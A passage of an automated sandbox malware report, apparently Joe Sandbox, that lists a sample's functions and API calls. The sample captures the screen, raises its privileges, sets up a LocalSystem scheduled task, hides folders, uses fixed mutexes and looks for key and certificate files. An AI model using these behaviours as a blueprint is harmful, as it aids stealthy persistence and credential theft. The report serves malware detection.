                                                                                                                                                                                                                • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                                • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=5w$task%d
                                                                                                                                                                                                                • API String ID: 1601901853-2340070504
                                                                                                                                                                                                                • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                                • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                                Function 02BC2040 Relevance: 65.0, APIs: 34, Strings: 3, Instructions: 284filewindowmemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 02BC2053
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 02BC2064
                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 02BC2079
                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02BC208E
                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 02BC20A8
                                                                                                                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00660046), ref: 02BC20D6
                                                                                                                                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 02BC20EC
                                                                                                                                                                                                                • GlobalAlloc.KERNEL32 ref: 02BC215C
                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 02BC216F
                                                                                                                                                                                                                • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 02BC218C
                                                                                                                                                                                                                • CreateFileA.KERNEL32(02BC255E,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02BC21A6
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: CloseHandle.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC21CD
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02BC21EF
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(02BC255E,00000001,00000010,00000000,00000000,00000000,?), ref: 02BC2209
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 02BC2214
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC223C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000), ref: 02BC224C
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 02BC2260
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,0000000E,00000000), ref: 02BC2270
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC227F
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000028,00000000), ref: 02BC228F
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 02BC22A3
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,00000028,00000000), ref: 02BC22B3
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC22CC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BC22DB
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02BC22EE
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BC22FD
                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 02BC2308
                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 02BC230F
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC2323
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC2335
                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 02BC2340
                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 02BC234C
                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 02BC2358
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$GlobalLockSecurityUnlock$CreateDescriptorHandleObjectPointerTokenWrite$CloseCompatibleCurrentFreeOpenProcessReleaseThread$AdjustAllocBitmapBitsConvertCursorDeleteErrorInfoInformationLastLocalLookupNamedPrivilegePrivilegesSaclSelectStringValue
                                                                                                                                                                                                                • String ID: ($6$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 532523266-808120212
                                                                                                                                                                                                                • Opcode ID: 9f6edfab599cb525770d5883a4ce0e90cb54a9bd3dd33fcae9a93b11e0878954
                                                                                                                                                                                                                • Instruction ID: 7ccd0a5ff0d4d5a762415c6fb49a14866f6acfd14a00cb9e85bb6be09aae408b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f6edfab599cb525770d5883a4ce0e90cb54a9bd3dd33fcae9a93b11e0878954
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6914BB2545300AFE3609F64DC88EABBBECEFC8785F508A1DF68597240D7709905CB62
                                                                                                                                                                                                                Function 02BCF9C0 Relevance: 65.0, APIs: 31, Strings: 6, Instructions: 256memorysynchronizationsleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d7242), ref: 02BCF9E8
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(02C0DDC8,00000000), ref: 02BCFA29
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCFA2F
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCFA37
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(02C0DDC8), ref: 02BCFA46
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCFA4D
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(02C0DDC8,00000000), ref: 02BCFA89
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(02C0DDC8), ref: 02BCFA94
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d7242,?,?), ref: 02BCFAD6
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(02C0D998,00000000), ref: 02BCFB11
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCFB17
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCFB1F
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(02C0D998), ref: 02BCFB2E
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCFB35
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(02C0D998,00000000), ref: 02BCFB63
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCFB69
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCFB71
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(02C0D998), ref: 02BCFB80
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCFB87
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02BCFB91
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCFBC7
                                                                                                                                                                                                                • SHFileOperationA.SHELL32(?), ref: 02BCFC41
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BCFC52
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214},00000006), ref: 02BCFC6F
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BCFC76
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCFC88
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCFC98
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCFCAA
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BCFCAD
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCFCBA
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BCFCBD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$CreateFileHeap$AdminDirectoryFolderMakeSystemUser$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                                • String ID: 617d7242$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$\*.bk$keys\$path.txt
                                                                                                                                                                                                                • API String ID: 959110331-3906905890
                                                                                                                                                                                                                • Opcode ID: d450f5d114425089414d17ae63550c45a8d571160d3a536aae205eaa31b849b0
                                                                                                                                                                                                                • Instruction ID: 5e8e7231d5f322158e474f43c9312e40ee0a3bcf937641c87bc4bef6abcdcdc3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d450f5d114425089414d17ae63550c45a8d571160d3a536aae205eaa31b849b0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE91F730E407469FEB214F78A858BABBFE5EF4A740F6485DAE986D7340DB708510C7A0
                                                                                                                                                                                                                Function 02BB80C0 Relevance: 63.2, APIs: 32, Strings: 4, Instructions: 182memorysleepsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: IsUserAnAdmin.SHELL32 ref: 02BB7C8A
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: memset.MSVCRT ref: 02BB7CC1
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: memset.MSVCRT ref: 02BB7CD9
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,7556F380), ref: 02BB7CFB
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,7556F380), ref: 02BB7D21
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,7556F380), ref: 02BB7DAD
                                                                                                                                                                                                                  • Part of subcall function 02BB7C80: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,7556F380), ref: 02BB7DB4
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02BB8105
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BB8112
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02BB8124
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BB812D
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB8145
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB8157
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,9E938F5Ca,9e938fdda), ref: 02BB8162
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB8165
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8172
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB8175
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,9E938F5Ca,9e938fdda), ref: 02BB8182
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB8185
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8192
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB8195
                                                                                                                                                                                                                • SetCaretBlinkTime.USER32(000000FF), ref: 02BB81A7
                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 02BB81D5
                                                                                                                                                                                                                • StrToIntA.SHLWAPI(00000000,9E938F5Ca,9e938fdda), ref: 02BB8205
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,9E938F5Ca,9e938fdda), ref: 02BB8215
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB8218
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8225
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB8228
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,9E938F5Ca,9e938fdda), ref: 02BB8235
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB8238
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8245
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB8248
                                                                                                                                                                                                                • Sleep.KERNEL32(00001388,9E938F5Ca,9e938fdda), ref: 02BB8253
                                                                                                                                                                                                                • closesocket.WS2_32(?), ref: 02BB8285
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 02BB82A5
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB82BD
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BB82CF
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB82F2
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB830C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
                                                                                                                                                                                                                • String ID: 9E938F5Ca$9e938fdda$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}$P0Wu
                                                                                                                                                                                                                • API String ID: 2871222221-3108295826
                                                                                                                                                                                                                • Opcode ID: 0fc660a88280c8a87043753b7a18c4c0576a1e6a04dfde033d2f8ab01ae2346a
                                                                                                                                                                                                                • Instruction ID: 831aca38907dfe62bddd1553c83d58595776b516f6e71ab4e18650b822dc7f69
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fc660a88280c8a87043753b7a18c4c0576a1e6a04dfde033d2f8ab01ae2346a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D351E331A817016BE7726B749C4CFBB376DEF44B95F444A94FA599B180DBB0C810CBA1
                                                                                                                                                                                                                Function 02BCC850 Relevance: 58.0, APIs: 25, Strings: 8, Instructions: 271fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCC86F
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC), ref: 02BCC8A7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCC8E7
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCC8F1
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCC8F9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCC90A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCC911
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,crypto), ref: 02BCC923
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,self.cer), ref: 02BCC936
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,self.pub), ref: 02BCC947
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCC992
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BCC99F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                                • String ID: 617D73AC$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0Wu$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                                • API String ID: 3980609930-448518846
                                                                                                                                                                                                                • Opcode ID: 88a3b16cb252b112502ad104c6c1ad0ab3ffa2c05d36c228e01ece7a1434c6e6
                                                                                                                                                                                                                • Instruction ID: 095c5035698c4be66ea2500776de022db699ea355080c5e341bc2693ee7e40a7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88a3b16cb252b112502ad104c6c1ad0ab3ffa2c05d36c228e01ece7a1434c6e6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10917631D402099FDB26CB789858BEA7FE8EF59740F2445DEEA4ED7240DB709944CBA0
                                                                                                                                                                                                                Function 02BCEB30 Relevance: 54.5, APIs: 26, Strings: 5, Instructions: 223memorysynchronizationsleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCEB4E
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d72c4), ref: 02BCEB7A
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCEBBD
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCEBC3
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCEBCB
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCEBDC
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCEBE3
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCEC1B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BCEC28
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d72c4,?,?), ref: 02BCEC67
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02BCECA5
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCECAC
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCECB4
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02BCECC5
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCECCC
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02BCED06
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BCED31
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000000,?), ref: 02BCED55
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000006), ref: 02BCED72
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BCED79
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCED8B
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCED9C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCEDAB
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BCEDAE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCEDBB
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BCEDBE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorHeapLastPath$CreateDirectoryFile$AdminAttributesBackslashFolderHandleMakeMutexProcessSystemUser$CloseCurrentDeleteFreeInformationReleaseSleepValidatememset
                                                                                                                                                                                                                • String ID: 617d72c4$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$P0Wu$keys.zip$path.txt
                                                                                                                                                                                                                • API String ID: 1472338570-3760082667
                                                                                                                                                                                                                • Opcode ID: fb9043353c9a3f642428f2ffbbaff115dee80e5f5c30fe3208f2afc6fc8558b1
                                                                                                                                                                                                                • Instruction ID: 9f136754a1750cd4c54a7908d430c77418d29cd0ca2011ccfc825222ceeef525
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb9043353c9a3f642428f2ffbbaff115dee80e5f5c30fe3208f2afc6fc8558b1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D7124309407559FDB718B38D858BEB7BE8EF45740F6489C8EA86D7240DB70DA44CBA0
                                                                                                                                                                                                                Function 004018E0 Relevance: 52.7, APIs: 29, Strings: 1, Instructions: 234memoryprocessCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75435430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                • API String ID: 3422789474-2746444292
                                                                                                                                                                                                                • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
